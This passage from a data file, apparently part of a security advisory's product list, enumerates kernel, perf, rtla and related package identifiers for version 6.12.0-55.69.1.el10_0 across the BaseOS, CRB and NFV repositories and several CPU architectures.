"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
